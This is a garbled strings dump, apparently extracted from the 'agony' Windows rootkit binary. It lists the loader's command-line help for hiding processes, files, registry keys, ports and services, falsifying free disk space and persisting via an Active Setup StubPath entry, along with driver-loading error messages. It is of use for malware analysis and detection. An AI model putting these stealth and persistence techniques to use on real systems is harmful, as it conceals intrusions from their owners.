?%s -p process.exe : hide the process
??%s -f file/dir : hide the file
?%s -k key : hide the reg key
??%s -v value : hide the reg value
????%s -tcp port : hide the TCP port
?%s -udp port : hide the UDP port
?%s -s service : hide the service
??%s -space C:X : add X MB to available space on volume C
???%s -r : survive to reboot (with all option in this cmdline)
???%s -stop : stop and uninstall rootkit
????%s -h : more help
?BITMAP?agony?cannot find ressource
?cannot load ressource
??cannot lock ressource into memory
?%s.sys?decompression error %s: %d
???{232f4e3f2-bab8-11d0-97b9-00c04f98bcb9}?Software\Microsoft\Active Setup\Installed Components?\??{256dc5e0e-7c46-11d3-b5bf-0000f8695621}?StubPath?VOLUME.INI?%c:\%s?\\?agony.sys?-stop?-h?extracting .sys...
?cannot extract sys file...
????cannot create/open the service
?cannot open the service manager
?\\.\Global\%s??cannot communicate with the driver.
????all options "cumulables" in a same command line
????for exemple: agony -p process1.exe process2.exe will hide 2 process
????we can accumulate different options on a same line:
????%s -p process.exe process2.exe -s service1 -f process1.exe process2.exe
????we can also choose to launch our command one by one

???for the -space option, the syntax is:
??%s -space volume_letter:space_to_hide_in_MB
????we can cumulate for option -space, like other options:
?%s -space C:5000 D:1000 F:5500
?-p?-f?-k?-v?-s?-tcp?-udp?-space?-r? ????volume %c space will not be falsificated
?V?O?L?U?M?E?.?I?N?I???????????-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32???w32_sharedptr->size == sizeof(W32_EH_SHARED)?%s:%u: failed assertion `%s'
??../../gcc/gcc/config/i386/w32-shared-ptr.c??GetAtomNameA (atom, s, sizeof(s)) !